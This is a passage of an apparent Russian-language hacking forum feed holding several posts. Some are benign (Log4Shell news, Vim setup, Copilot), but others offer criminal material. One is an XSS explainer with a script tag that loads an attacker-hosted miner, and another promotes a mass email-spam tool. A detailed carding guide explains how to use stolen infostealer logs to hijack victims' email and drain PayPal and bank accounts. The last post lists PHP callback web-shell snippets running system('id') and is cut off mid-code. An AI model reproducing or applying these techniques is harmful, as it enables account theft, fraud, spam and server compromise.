https://hacknet.6bb.ru/ Hackers Academy ru-ru Fri, 08 Apr 2022 21:20:03 +0300 MyBB/mybb.ru https://hacknet.6bb.ru/viewtopic.php?pid=86#p86 <p>Привет хакерам! На связи Ugnikinn, сегодня расскажу вам что такое XSS и как его используют. Погнали!<br />Что такое XSS?<br />XSS (Межсайтовый скриптинг, Cross-Site Scripting) это внедрение HTML/CSS/JavaScript кода в базу данных сайта для его будущего исполнения браузером при загрузке одной из страниц сайта. То есть браузер при загрузке заражённой страницы выполнит внедрённый в эту страницу вредоносный код.<br />Происходит это обычно следующим образом - хакер ищет на сайте форму, данные из которой будут в дальнейшем отображаться на одной из страниц. Это может быть любое поле ввода на сайте, результаты которого будут видеть другие люди - форма авторизации, поле создания поста на блог площадке и т. д. В форму хакер помимо обычного текста, который туда нужно ввести, вводит код, исполняемый браузером при его обычном отображении. Код может быть любым - от рекламы и JS-майнеров до опасных вирусов, которые могут вырваться за рамки браузера или жучок, способный даже получить доступ к базе данных сайта, если он сохранится там.<br />Обычно для того чтобы можно было в любой момент изменить содержимое заражённой страницы, используют JavaScript, подгружающийся с страницы, доступ к которой имеет хакер. Делается это с помощью &lt;script src=&quot;[путь к коду JavaScript]&quot;&gt;&lt;/script&gt;. Обычно сайты блокируют спецсимволы в формах для того чтобы защититься от атак, но хакеры шифруют этот код так, что его не сможет распознать защита, но он тем не менее исполняется в браузере.<br />Возьмём для примера вымышленную блог платформу Blogex. Это площадка где люди могут вести свой блог и т. п. Однажды хакер под ником CrazyMad_ решил заработать на этом сайте. По-быстрому написал JS-майнер и решил действовать. Он купил популярный аккаунт в Blogex, повыкладывал посты недельку и потом решил выложить заражённый пост. Он залил свой код с майнером на хостинг и потом написал пост, но в конце поста добавил код &lt;script src=&quot;https://crazymad_js.superhosting.su/blogex_miner/&quot;&gt;&lt;/script&gt;, за предварительно превратив его в ASCII-код. Затем CrazyMad_ опубликовал пост, и всё!. Теперь как только он попадёт в ленту к его подписчикам, на их компьютере запустится майнер и займёт всю оперативную память и компьютер зависнет. Единственный способ прекратить этот ад - перезагрузить компьютер. И каждый раз, когда браузер будет загружать заражённый пост, компьютер будет превращаться в личный майнер CrazyMad_, пока его не перезагрузят.<br />На этом всё! В следующей статье я покажу как применять XSS на практике.<a href="https://upforme.ru/uploads/001b/01/6c/2/807053.jpg" rel="nofollow" target="_blank"><img class="postimg" loading="lazy" src="https://upforme.ru/uploads/001b/01/6c/2/t807053.jpg" alt="https://upforme.ru/uploads/001b/01/6c/2/t807053.jpg" /></a></p> mybb@mybb.ru (ФБР) Fri, 08 Apr 2022 21:20:03 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=86#p86 https://hacknet.6bb.ru/viewtopic.php?pid=85#p85 <p>«Интернет в огне»: критическая уязвимость Log4Shell терроризирует онлайн-сервисы<br /><a href="https://upforme.ru/uploads/001b/01/6c/2/429762.jpg" rel="nofollow" target="_blank"><img class="postimg" loading="lazy" src="https://upforme.ru/uploads/001b/01/6c/2/t429762.jpg" alt="https://upforme.ru/uploads/001b/01/6c/2/t429762.jpg" /></a></p> <p>Критическая уязвимость в Java, в библиотеке log4j, которая используется в тысячах сервисов, начиная от Minecraft и заканчивая Apple Cloud, быстро превращается в серьезную угрозу для организаций по всему миру. Уязвимости подвержены сервера Apple, Valve, Microsoft и других.</p> <p>&#160; «Интернет сейчас в огне», — сказал журналистам Адам Мейерс, старший вице-президент компании Crowdstrike, занимающейся кибербезопасностью. — «Люди изо всех сил стараются исправить это, и в то же время самые разные люди пытаются это использовать». В пятницу Мейерс сказал, что за 12 часов, прошедших с момента обнаружения уязвимости, она была «полностью поставлена на вооружение», и злоумышленники разработали и распространили инструменты для ее использования.</p> <p>Уязвимость позволяет злоумышленникам удаленно выполнять код на уязвимых серверах, давая им возможность импортировать вредоносное ПО, которое может полностью скомпрометировать любые машины.<br />Уязвимость обнаружена в log4j, библиотеке логирования Java-программ с открытым исходным кодом. Ее используют тысячи игр и приложений, в том числе облачные сервера и корпоративное ПО. Почти каждая сетевая система безопасности запускает какой-то процесс регистрации, что дает огромные возможности популярным библиотекам, таким как log4j. Затронуты все системы и службы, использующие библиотеку логирования Java, Apache Log4j между версиями 2.0 и 2.14.1, включая многие службы и приложения, написанные на Java.</p> <p>Уязвимость, получившая название «Log4Shell», может стать самой серьезной, обнаруженной за последние годы. Ей подвержены крупные компании и даже сайты правительства стран. С её помощью даже новички в области программирования могут получить доступ к внутренним сетям, где они могут похищать ценную информацию, устанавливать вредоносные программы, стирать важные данные и так далее.<br />Мне сложно представить себе компанию, для которой это не риск. Неисчислимые миллионы серверов работают с log4j, полные последствия не будут известны в течение нескольких дней.</p> <p>Амит Йоран, гендиректор компании Tenable, занимающейся кибербезопасностью, назвал Log4Shell «самой большой и самой критической уязвимостью последнего десятилетия». «и, возможно, самой большой в истории современных компьютеров».<br /><br /><br /></p> <p>Одной из первых публично об обнаружении уязвимости рассказала группа реагирования на чрезвычайные компьютерные ситуации Новой Зеландии. Тогда же, в четверг, через несколько часов был выпущен патч. Apache об уязвимости, обнаруженной в её ПО, еще 24 ноября сообщила Alibaba. На разработку и выпуск фикса ушло две недели.</p> <p>Хотя патч сейчас и выпущен, мало кто знает о наличии уязвимости (за исключением злоумышленников), поэтому многие сервера остаются уязвимыми. Так, как сообщает LunaSec, уже обнаружено, что Steam и iCloud от Apple сейчас уязвимы.<br />Миллионы приложений используют Log4j для ведения журналов, и все, что нужно сделать злоумышленнику — это заставить приложение зарегистрировать специальную строку.</p> <p>Пока что исследователи обнаружили доказательства того, что уязвимость может быть использована на серверах таких компаний, как Apple, Amazon, Twitter и Cloudflare.</p> mybb@mybb.ru (ФБР) Fri, 08 Apr 2022 21:16:39 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=85#p85 https://hacknet.6bb.ru/viewtopic.php?pid=84#p84 <p>Салом, КулХацкер!<br /> Мы решили сделать обзор новой нашей утилиты для Email спама кастомным текстом.<br /> Напишите в комментариях, хотели бы вы видеть такие обзоры.<br />Custom Email Spam (CES) - утилита для Email спама. Её особенность в том, что она спамит кастомным текстом, а не просто вбивает емейл жертвы в полях регистрации.</p> <p> В общем, поэтому и называется Custom Email Spam, а не Email Bomber. Вся прелесть CES в том, что он использует не API сервисов, а протокол SMTP. CES может спамить массово - с заданных емейл адресов на заданные емейл адреса. В первой версии нужно указывать SMTP сервер и порт, но в будущих версиях планируется автоматическое распознавание сервера по домену и словарь - для какого домена какой сервер. К примеру для GMail, Yandex, Mail.ru и Outlook скрипт будет использовать их сервера, а для остальных использовать шаблон &quot;smtp.[example.com]:465&quot;. Ну а пока что будут просто шпаргалки по SMTP серверам в файле README.md репозитория. CES может отправлять письма определенным количеством и с определенной задержкой. К примеру, в файл &quot;from.txt&quot; (который содержит почты-отправители в формате &quot;[почта]:[пароль]:[SMTP сервер]:[SMTP порт]&quot;), мы записали две почты - &quot;example1@gmail.com:qwe123qwe123:smtp.gmail.com:465&quot; и &quot;example2@gmail.com:qwerty123456:smtp.gmail.com:465&quot;, в файл &quot;to.txt&quot; (который содержит почты-получатели) - &quot;example3@gmail.com&quot; и &quot;example4@gmail.com&quot;, а в файл &quot;mail.txt&quot; (который содержит письмо) - &quot;Привет!&quot;. Запускаем скрипт и вводим количество писем - 3, и задержку в секундах - 5. При таких параметрах произойдёт следующее - сначала с почты example1@gmail.com отправится 3 письма с текстом &quot;Привет!&quot; на example3@gmail.com с задержкой в пять секунд между письмами, а потом точно также эти 3 письма с такой же задержкой и текстом отправятся на почту example4@gmail.com. Потом всё это повторится, только вместо example1@gmail.com письма будут отправляться с почты example2@gmail.com. Каждый получатель получит 6 писем с текстом &quot;Привет!&quot;, 3 из них будут отправлены example1@gmail.com, а 3 - example2@gmail.com. Вроде всё просто и эффективно.<br />Установка (BASH):<br />cd &amp;&amp; pkg install git python -y &amp;&amp; git clone <a href="https://github.com/academyofhackers/CES/" rel="nofollow" target="_blank">https://github.com/academyofhackers/CES/</a><br />Использование (BASH):<br />cd &amp;&amp; cd CES<br />Затем заносите почты-отправители в файл &quot; from.txt&quot; в формате [почта]:[пароль]:[SMTP сервер]:[SMTP порт], почты-получатели в файл &quot;to.txt&quot; и письмо в файл &quot;mail.txt&quot; и прописываем:<br />python3 ces.py</p> <p>UPD: Кто захочет стырить код - не получится, на скрипте лицензия стоит и если я замечу, что ты своровал код, то я смогу забанить твой гитхаб навсегда))). И если вы будете показывать этот скрипт на своём&#160; канале и т.д. - убедительная просьба оставлять ссылку на наш канал в Telegram, группу ВК, страницу Facebook, канал в Дзен, или на профиль админов на HAF.</p> <p><a href="https://github.com/academyofhackers/CES/" rel="nofollow" target="_blank">https://github.com/academyofhackers/CES/</a></p> mybb@mybb.ru (ФБР) Mon, 05 Jul 2021 21:47:39 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=84#p84 https://hacknet.6bb.ru/viewtopic.php?pid=83#p83 <p>Наш генератор BTC </p> <p><a href="https://github.com/academyofhackers/btc-check-generator" rel="nofollow" target="_blank">https://github.com/academyofhackers/btc-check-generator</a></p> mybb@mybb.ru (ФБР) Mon, 05 Jul 2021 21:45:10 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=83#p83 https://hacknet.6bb.ru/viewtopic.php?pid=82#p82 <p>Наш бот в Телеграм</p> <p><a href="https://t.me/Quick_OSINT_bot?start=1751561225" rel="nofollow" target="_blank">https://t.me/Quick_OSINT_bot?start=1751561225</a></p> mybb@mybb.ru (ФБР) Mon, 05 Jul 2021 21:44:16 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=82#p82 https://hacknet.6bb.ru/viewtopic.php?pid=81#p81 <p>Наш бот в телеграм</p> <p><a href="https://t.me/Quick_OSINT_bot?start=1751561225" rel="nofollow" target="_blank">https://t.me/Quick_OSINT_bot?start=1751561225</a></p> mybb@mybb.ru (ФБР) Mon, 05 Jul 2021 21:43:39 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=81#p81 https://hacknet.6bb.ru/viewtopic.php?pid=80#p80 <p>Генератор BTC чеков для активации в Telegram боте @BTC_CHANGE_BOT </p> <p><a href="https://github.com/academyofhackers/btc-check-generator" rel="nofollow" target="_blank">https://github.com/academyofhackers/btc-check-generator</a></p> mybb@mybb.ru (ФБР) Mon, 05 Jul 2021 21:42:27 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=80#p80 https://hacknet.6bb.ru/viewtopic.php?pid=79#p79 <p>Мой скрипт для массовой рассылки рекламы. Зависимости устанавливать не надо, т.к. здесь используется для рассылки встроенная библиотека<br />smtplib<br />. Инструкция по установке и использованию в GitHub репозитории.</p> <p><a href="https://github.com/academyofhackers/CES/" rel="nofollow" target="_blank">https://github.com/academyofhackers/CES/</a></p> mybb@mybb.ru (ФБР) Mon, 05 Jul 2021 21:40:21 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=79#p79 https://hacknet.6bb.ru/viewtopic.php?pid=78#p78 <p>Салом КулХацкер!<br />Логи со стилера. Где все деньги ?<br />Что такое стилер?<br />Это программный код, который служит для кражи паролей и прочих данных с компьютера. Добытые данные отправляются на почту, либо на FTP.</p> <p>Как происходит сам процесс заражения?</p> <p>Первым делом человек создает код на каком-либо языке программирования, затем использует знания криптографии и скрывает стиллер таким образом, чтобы его не нашли антивирусы. Он может быть везде, даже в самой обычной картинке. Довольно частый способ распространения этой заразы — заражение всевозможных crack'ов (активаторов), например, активатор Windows 7, который ищет почти каждый мамонт, установивший свеженькую ОС на свой компьютер. Скачал, активировал Windows, а на компе поселился стилер, который отныне будет воровать все твои данные и отправлять их хакеру Пете из 5Б.</p> <p>Так что же именно ворует стилер?</p> <p>Чаще всего, целью являются сохраненные пароли из браузеров: всевозможные аккаунты (eBay, Amazon, Walmart и т.д.), банки, крипто валютные биржи и кошельки. Также есть некоторые стилеры, получающие пароли с онлайн игр, которые сохранены в клиенте игры. Отправка паролей может происходить в открытую — т.е. уже расшифрованные пароли передаются на GATE, FTP или email, или же в зашифрованном виде.</p> <p>Что такое ЛОГИ?</p> <p>Это все данные, которые стилеру удалось украсть и выслать хакеру. Обычно логи включают в себя:</p> <p>Cookie файлы с зараженного компьютера. Может содержать несколько файлов с названиями браузеров, используемых пользователем ПК.<br />Список логинов, паролей и сайтов пользователя (например — Amazon.com, login: tupica777, pass: ochko123).<br />Файл с настройками системы и оборудованием зараженного компьютера (используемая операционная система, IP-адрес, железо).<br />Снимок экрана в момент заражения. Так можно понять как и в какой момент стилер &quot;залез&quot; на комп несчастной жертве. А также это даёт немного информации о пользователе.<br />...</p> <p>Допустим, что ты получил эти самые логи, ну или добыл их самостоятельно, если ты крутой кардер со своим стилером. Что делать дальше? Теперь тебе нужно максимально близко подстроиться под своего КХ. Пробивай его IP и узнавай адрес, больше всего интересует ZIP-код и город, подбирай прокси/тунель под эти данные. Настраивай систему:</p> <p>Меняй часовой пояс.<br />Подбирай UserAgent.<br />Подстраивай разрешение экрана.<br />Короче говоря, меняй все свои параметры и настройки на те данные, которые известны о КХ.<br />Итак, всё настроено! Заходишь на Whoer.net, теперь ты — тот самый американец или американка. Чисти куки, я считаю, что после хуера это делать необходимо. Далее загружай в браузер куки, полученные со стилера. Если ты не используешь сферу, то ищи расширение на свой браузер для импорта/экспорта куков. Теперь смело иди на Google.com и смотри как автоматически залетаешь на одну из почт КХ (это случается в 99% случаев), если этого не произошло, то высматривай в списке лог/пас почтовые аккаунты. Почта крайне важна для дальнейшей работы, так как практически при любом твоём действии — будь то перевод средств с PayPal аккаунта или покупка на Amazon.com 4К телевизора, который ты уже договорился отправить на дропа — на почту КХ приходит уведомление об этом действии. Так вот доступ к почте нужен для того, чтобы это оттуда вычистить!</p> <p>Всё!</p> <p>Побежал теперь по всем аккаунтам этого недотёпы, покупая шмотки, технику или что там твоей преступной душе угодно. Понятное дело, что наглеть не стоит, лучше, конечно же, действовать аккуратно. Купил товар, скрыл покупку в шопе (если это eBay или Amazon), пошёл на почту, удалил сообщение о получении Order'а и ждёшь получение трека, периодически чекая почту КХ (тебе ведь и это письмо надо будет удалить).</p> <p>Работа с логами, изображение №2<br />Примерно так выглядит работа с обычной вещевухой при помощи логов.</p> <p>Кроме этого, тебе может попасться PayPal аккаунт с нормальным балансом. То есть, залетев на такой аккаунт, ты можешь попытаться перевести все деньги КХ, например, на свой раскачанный саморег, который только и ждет нового поступления $$$.</p> <p>Работа с логами, изображение №3<br />Например, вот такой баланс, неплохо такое вывести, да?</p> <p>Нельзя забывать и про банковские аккаунты, на которых тоже довольно часто имеются нехилые запасы деньжат. Хотя необходимо понимать, что для вывода с БА только лишь одного желания маловато! Нужны некоторые навыки и понимание процесса, но помни, что нет ничего невозможного, друг.</p> <p>Работа с логами, изображение №4<br />Именно исходя из всего выше написанного, я и сделал для себя вывод, что ЛОГИ — это одна из самых прибыльных и денежных тем в кардинге. Да, тут очень многое зависит от материала, то есть от его качества. На рынке существует масса сомнительных предложений от всевозможных перекупов.</p> mybb@mybb.ru (ФБР) Mon, 05 Jul 2021 21:36:31 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=78#p78 https://hacknet.6bb.ru/viewtopic.php?pid=77#p77 <p>BGram-7.8.0 (74802)<br />&#10004;&#65039; Stable&#8288;</p> <p>• Remove hidden chats from global media section when &quot;Remove hidden chats from search&quot; is enable.</p> <p>BGram-7.8.0 (74800)<br />&#10004;&#65039; Stable&#8288;</p> <p>• Source code update to 7.8.0 (2360).<br />• Unlimited marked messages in any chat.<br />• All Marked messages in sidebar with ability to sort them by added date or msg original date.<br />• Backup and restore for marked messages. <br />• Update edited marked messages manually all at ones.<br />• Multi mark messages in chat.<br />• People Nearby removed from sidebar. Now everything related to communication (including Contacts, New group/channel, People nearby, Invite friends) is in the Chats section.<br />• Indonesian translation added.</p> <p>Download - <a href="https://play.google.com/store/apps/details?id=org.telegram.BifToGram" rel="nofollow" target="_blank">https://play.google.com/store/apps/deta &#8230; .BifToGram</a></p> mybb@mybb.ru (ФБР) Mon, 05 Jul 2021 21:34:39 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=77#p77 https://hacknet.6bb.ru/viewtopic.php?pid=76#p76 <p>GitHub Copilot - сервис на основе искусственного интеллекта для проверки и улучшения кода<br />Это совместный проект от Microsoft и OpenAI. Сервис просматривает ваш код и дает рекомендации по его улучшению, на основе технологии искусственного интеллекта.<br />Copilot просматривает существующий код, комментарии к коду и положение курсора. На основе этих данных он предлагает добавить одну или несколько строк кода. Пока что лучше всего Copilot работает с JavaScript/TypeScript и Python.<br />Ссылка на сервис<br /><a href="https://copilot.github.com/" rel="nofollow" target="_blank">https://copilot.github.com/</a></p> mybb@mybb.ru (ФБР) Mon, 05 Jul 2021 21:31:58 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=76#p76 https://hacknet.6bb.ru/viewtopic.php?pid=75#p75 <p><a href="https://gb.ru/professions/python-for-business" rel="nofollow" target="_blank">https://gb.ru/professions/python-for-business</a><br />Курс Python для решения бизнес-задач<br /><a href="https://cloud.mail.ru/public/t4Dp/TE2KB6aGY/" rel="nofollow" target="_blank">https://cloud.mail.ru/public/t4Dp/TE2KB6aGY/</a></p> mybb@mybb.ru (ФБР) Mon, 05 Jul 2021 21:29:20 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=75#p75 https://hacknet.6bb.ru/viewtopic.php?pid=74#p74 <p>Россия использует новую технологию для замедления интернет-трафика на территории страны, сообщают специалисты организации Censored Planet. По их словам, это первый известный случай, когда правительство подвергает цензуре интернет-контент, ограничивая трафик компании, а не блокируя доступ к ее услугам.</p> <p>Речь идет о замедлении трафика Twitter Роскомнадзором за неисполнение требований российского законодательства по удалению противоправного контента. Как сообщает Censored Planet, для этого регулятор использует ТСПУ (технические средства противодействия угрозам), пришедшие на смену СОРМ (система технических средств для обеспечения функций оперативно-розыскных мероприятий).</p> <p>СОРМ, состоящая из специальных сетевых устройств, установленных в дата-центрах операторов связи, позволяет блокировать доступ к определенным доменам, добавляя их в реестр запрещенных ресурсов. При наличии решений суда и Роскомнадзора операторы связи должны менять соответствующие настройки межсетевого экрана и блокировать трафик этих доменов.</p> <p>Однако в последние годы стало ясно, что такую блокировку можно обойти с помощью прокси- и VPN-сервисов. Кроме того, компании наподобие Telegram нашли способы обхода блокировки с помощью домен-фронтинга (использования разных доменных имен на разных уровнях HTTPS-соединения для незаметного подключения к другому целевому домену, не заметному третьим сторонам, отслеживающим запросы и соединения).</p> <p>Новые ТСПУ работают не так, как СОРМ. Во-первых, они не находятся под контролем операторов связи и управляются непосредственно Роскомнадзором. Во-вторых, ТСПУ развертываются на два шага ближе к конечному пользователю, чем СОРМ. В-третьих, эти устройства работают не как традиционные межсетевые экраны, а скорее, как сетевые DPI-фильтры. Решения на базе DPI позволяют видеть содержимое сетевых пакетов и реальное место их назначения, даже если соединение шифруется с помощью TLS.</p> <p>Как пояснили эксперты Censored Planet, ТСПУ работают путем анализа расширения SNI протокола TLS, благодаря чему Роскомнадзор может определить, к какому домену подключается пользователь, еще до того, как соединение будет зашифровано.</p> <p>Инцидент с Twitter является первым случаем использования ТСПУ. По словам экспертов, это объясняет, почему первый запуск системы прошел неудачно – слишком широкое правило фильтрации привело к замедлению не только трафика Twitter, но других доменов.</p> mybb@mybb.ru (ФБР) Thu, 15 Apr 2021 18:12:55 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=74#p74 https://hacknet.6bb.ru/viewtopic.php?pid=73#p73 <p>VIM в качестве IDE<br />Салом КулХацкер!</p> <p>VIM в качестве IDE, изображение №1<br />В самом начале пути девелопера, осознавшего что все это время он жил неправильно пока не начал использовать VIM, подстерегают страшные вещи. Одна из них - первичная настройка VIM в качестве IDE. Вооружившись клавой он заходит в гугл - и там ему советуют поставить, значит NerdTree чтобы православно переключаться между файлами - и cscope, чтобы иметь возможность использовать все эти автодополнения кода.</p> <p>Но тут возникает вопрос. Я же не все время сижу и нашлепываю что-то на C++. Иногда мне надо и html нашлепать и python тоже, и вообще таксказать latex я тоже юзаю. Как жить дальше ?</p> <p>Сегодня меня наконец достали этим вопросом и я так подумал-подумал и нашлепал вот такой краткий ликбез.</p> <p>1) Vim на самом деле умеет замечательно распознавать типы файлов. Он магическим образом узнает где тут html а где latex (ну не таким уж и магическим - но не важно). А еще у него есть такая замечательная возможность: использовать для разных файлов свой конфиг.</p> <p>Для этого, внутри директории с настройками (для Linux это ~/.vim) необходимо создать путь after/ftplugin. Внутри ftplugin можно создавать такие конфиги. Имя этого конфига должно совпадать с типом файла, для которого он предназначен и расширением .vim. Так, для просмотра манов - это man.vim, для Си - это c.vim, LaTex - tex.vim, ассемблер - asm.vim и.т.д.</p> <p>Вот внутри этих файлов совершенно не напрягаясь и не мудрствуя лукаво можно назначать сочетания клавиш для того чтобы скомпилить/запустить все что угодно.</p> <p>Для примера - вот что у меня находится в c.vim:</p> <p>Code:</p> <p>map &lt;F5&gt; :wall \| make&lt;Cr&gt;:!cscope -R -b&lt;Cr&gt;:cscope add cscope.out&lt;Cr&gt;&lt;Cr&gt;:cl&lt;Cr&gt; <br />А вот tex.vim</p> <p>Code:</p> <p>map &lt;F5&gt; :!pdflatex &lt;C-R&gt;%&lt;CR&gt;<br />Соответственно для разных файлов кнопалка F5 работает по разному. HTML открывает в браузере, компиляет c++, собирает PDF из tex и так далее.</p> <p>==========================</p> <p>2) Цветовые схемы. Многие из тех кто пытался найти схему под себя сталкивались с тем что это сделать не так просто как хотелось - бы. Некоторые просто не подходят, некоторые другие работают непредсказуемо. Тоесть при переключении одной на другую появляются всякие чудеса, некоторый текст оказывается темно-синим на черном фоне что доставляет особое удовольствие.</p> <p>Казалось-бы штука незначительная - но напрягает. А решается она точно так же. В каждом конфиге из п.1 просто прописываем нужную тему. А саму тему создаем сами: ~/.vim/colors/MyCoolName.vim</p> <p>Начало можно спереть из какой-нибудь другой темы, скажем так:</p> <p>Code:</p> <p>highlight clear<br />if exists(&quot;syntax_on&quot;)<br />&#160; syntax reset<br />endif</p> <p>set background=dark<br />set t_Co=256<br />let g:colors_name=&quot;DartPhoenix&quot;</p> <p>let python_highlight_all = 1<br />let c_gnu = 1</p> <p>hi Normal&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ctermfg=253&#160; &#160; &#160; &#160; &#160;ctermbg=234&#160; &#160; &#160; &#160; &#160;cterm=None<br />hi Cursor&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;ctermfg=253&#160; &#160; &#160; &#160; &#160;ctermbg=57&#160; &#160; &#160; &#160; &#160; cterm=None<br />hi SpecialKey&#160; &#160; &#160; &#160; &#160; &#160; ctermfg=70&#160; &#160; &#160; &#160; &#160; ctermbg=None&#160; &#160; &#160; &#160; cterm=None<br />hi Directory&#160; &#160; &#160; &#160; &#160; &#160; ctermfg=57&#160; &#160; &#160; &#160; &#160; ctermbg=254&#160; &#160; &#160; &#160; &#160;cterm=None<br />hi ErrorMsg&#160; &#160; &#160; &#160; &#160; &#160; &#160;ctermfg=160&#160; &#160; &#160; &#160; &#160;ctermbg=245&#160; &#160; &#160; &#160; &#160;cterm=None<br />hi PreProc&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ctermfg=243&#160; &#160; &#160; &#160; &#160;ctermbg=None&#160; &#160; &#160; &#160; cterm=Bold<br />hi Search&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ctermfg=234&#160; &#160; &#160; &#160; &#160;ctermbg=3&#160; &#160; &#160; &#160; &#160; &#160;cterm=Bold<br />hi Type&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ctermfg=166&#160; &#160; &#160; &#160; &#160;ctermbg=None&#160; &#160; &#160; &#160; cterm=Bold<br />hi Statement&#160; &#160; &#160; &#160; &#160; &#160; ctermfg=172&#160; &#160; &#160; &#160; &#160;ctermbg=None&#160; &#160; &#160; &#160; cterm=Bold<br />hi Comment&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ctermfg=240&#160; &#160; &#160; &#160; &#160;ctermbg=None&#160; &#160; &#160; &#160; cterm=None<br />hi LineNr&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ctermfg=244&#160; &#160; &#160; &#160; &#160;ctermbg=233&#160; &#160; &#160; &#160; &#160;cterm=None<br />hi NonText&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ctermfg=105&#160; &#160; &#160; &#160; &#160;ctermbg=None&#160; &#160; &#160; &#160; cterm=Bold<br />hi DiffText&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ctermfg=165&#160; &#160; &#160; &#160; &#160;ctermbg=244&#160; &#160; &#160; &#160; &#160;cterm=None<br />hi Constant&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ctermfg=76&#160; &#160; &#160; &#160; &#160; ctermbg=None&#160; &#160; &#160; &#160; cterm=None<br />hi Todo&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;ctermfg=162&#160; &#160; &#160; &#160; &#160;ctermbg=None&#160; &#160; &#160; &#160; cterm=Bold<br />hi Identifier&#160; &#160; &#160; &#160; &#160; &#160; ctermfg=142&#160; &#160; &#160; &#160; &#160;ctermbg=None&#160; &#160; &#160; &#160; cterm=Bold<br />hi Error&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ctermfg=None&#160; &#160; &#160; &#160; ctermbg=196&#160; &#160; &#160; &#160; &#160;cterm=Bold<br />hi Special&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; ctermfg=172&#160; &#160; &#160; &#160; &#160;ctermbg=None&#160; &#160; &#160; &#160; cterm=Bold<br />hi Ignore&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;ctermfg=221&#160; &#160; &#160; &#160; &#160;ctermbg=None&#160; &#160; &#160; &#160; cterm=Bold<br />hi Underline&#160; &#160; &#160; &#160; &#160; &#160; ctermfg=147&#160; &#160; &#160; &#160; &#160;ctermbg=None&#160; &#160; &#160; &#160; cterm=Italic</p> <p>hi FoldColumn&#160; &#160; &#160; &#160; &#160; &#160; ctermfg=132&#160; &#160; &#160; &#160; &#160;ctermbg=None&#160; &#160; &#160; &#160; cterm=None<br />hi Folded&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;ctermfg=132&#160; &#160; &#160; &#160; &#160;ctermbg=None&#160; &#160; &#160; &#160; cterm=Bold</p> <p>hi Visual&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;ctermfg=248&#160; &#160; &#160; &#160; &#160;ctermbg=238&#160; &#160; &#160; &#160; &#160;cterm=None<br />а потом - мутить уже свои настройки.</p> <p>В формате ничего страшного нет, пишем hi НазваниеЭлемента и далее цвета ctermfg, ctermbg, cterm... с этим проблем быть не должно.</p> <p>Вопрос: где взять название элемента и как это вообще делается.</p> <p>В конфиг vimrc добавляем такой скрипт:</p> <p>Code:</p> <p>&quot; Просмотр цветовой группы текущего элемента текста. Удалить, когда не будет надобности<br />map &lt;F4&gt; :call &lt;SID&gt;SynStack()&lt;CR&gt;<br />function! &lt;SID&gt;SynStack()<br />&#160; if !exists(&quot;*synstack&quot;)<br />&#160; &#160; return<br />&#160; endif<br />&#160; execute 'syntax on'<br />&#160; redraw<br />&#160; echo map(synstack(line('.'), col('.')), 'synIDattr(v:val, &quot;name&quot;)')<br />endfunc<br />Скрипт публичный, я его только модифицировал чтобы он обновлял по F4 текущую схему и можно было видеть сразу же произведенные настройки. Это можно сделать и автоматом - но мне лишний раз надавить F4 не сложно, поэтому я не запаривался.</p> <p>Итого открываем две консоли с vim. Одну с новенькой цветовой схемой - вторую с кодом на c++ например. В окне с кодом перемещаем курсор к слову int, например, и нажимаем F4 (есессно ничто не мешает назначить сею функцию на другую кнопку). В зависимости от настроек vim где-то должна вылезти подсказка &quot;cType&quot;. Что мы делаем ? Переключаемся на окно с конфигом цветовой схемы - и там пишем</p> <p>Code:</p> <p>hi cType&#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160;ctermfg=red&#160; &#160; &#160; &#160; &#160;ctermbg=green&#160; &#160; &#160; &#160;cterm=Underline<br />Сохраняем, переключаемся обратно на окно с кодом и нажимаем F4.</p> <p>Получаем некое вырвиглазное зрелище.</p> <p>VIM в качестве IDE, изображение №2<br />Вырвиглазное оно потому что нормальный человек вместо red и green напишет тот цветовой код, который ему больше нравится. А ненормальный... ему и так хорошо</p> <p>В результате за часик можно намутить себе вполне приличную и приятную на глаз тему оформления.</p> <p>Теперь к тому, почему при переключении этих тем могут происходить чудеса. А дело все в том что VIM при переключении этих тем не отменяет настройки, которые были сделаны предыдущей темой. И если в старой схеме есть подсветка int а в новой нет - то переключившись на новую - мы будем все еще иметь подсветку, которая была в старой. Эта проблема примитивно решается каким-то глобальным списком всех сделанных цветовых настроек, которые будут сбрасываться в дефолт. Можно сделать и похитрее - но на начальном этапе вроде-как это не требуется. Тем более ничто не мешает (кроме чувства эстетики и стремления к прекрасному) сделать таким образом одну тему на все случаи жизни.</p> <p>=============================</p> <p>Пока как-то так.</p> <p>:)<br />:)</p> mybb@mybb.ru (ФБР) Mon, 12 Apr 2021 06:52:58 +0300 https://hacknet.6bb.ru/viewtopic.php?pid=73#p73 https://hacknet.6bb.ru/viewtopic.php?pid=72#p72 <p>Функции обратного вызова<br />Салом КулХацкер!</p> <p>актуальные в php7.3, вызывать будем system(&quot;id&quot;);</p> <p>Функции обратного вызова, изображение №1<br />array_map<br />Code:</p> <p>array_map($_GET[x],$_GET);<br />?x=system&amp;_=id<br />2. array_walk, array_filter, array_walk_recursive</p> <p>Code:</p> <p>array_walk($_GET,$_GET[x]);<br />?x=system&amp;_=id<br />3. array_udiff</p> <p>Code:</p> <p>array_udiff($_GET,$_GET,$_GET[x]);<br 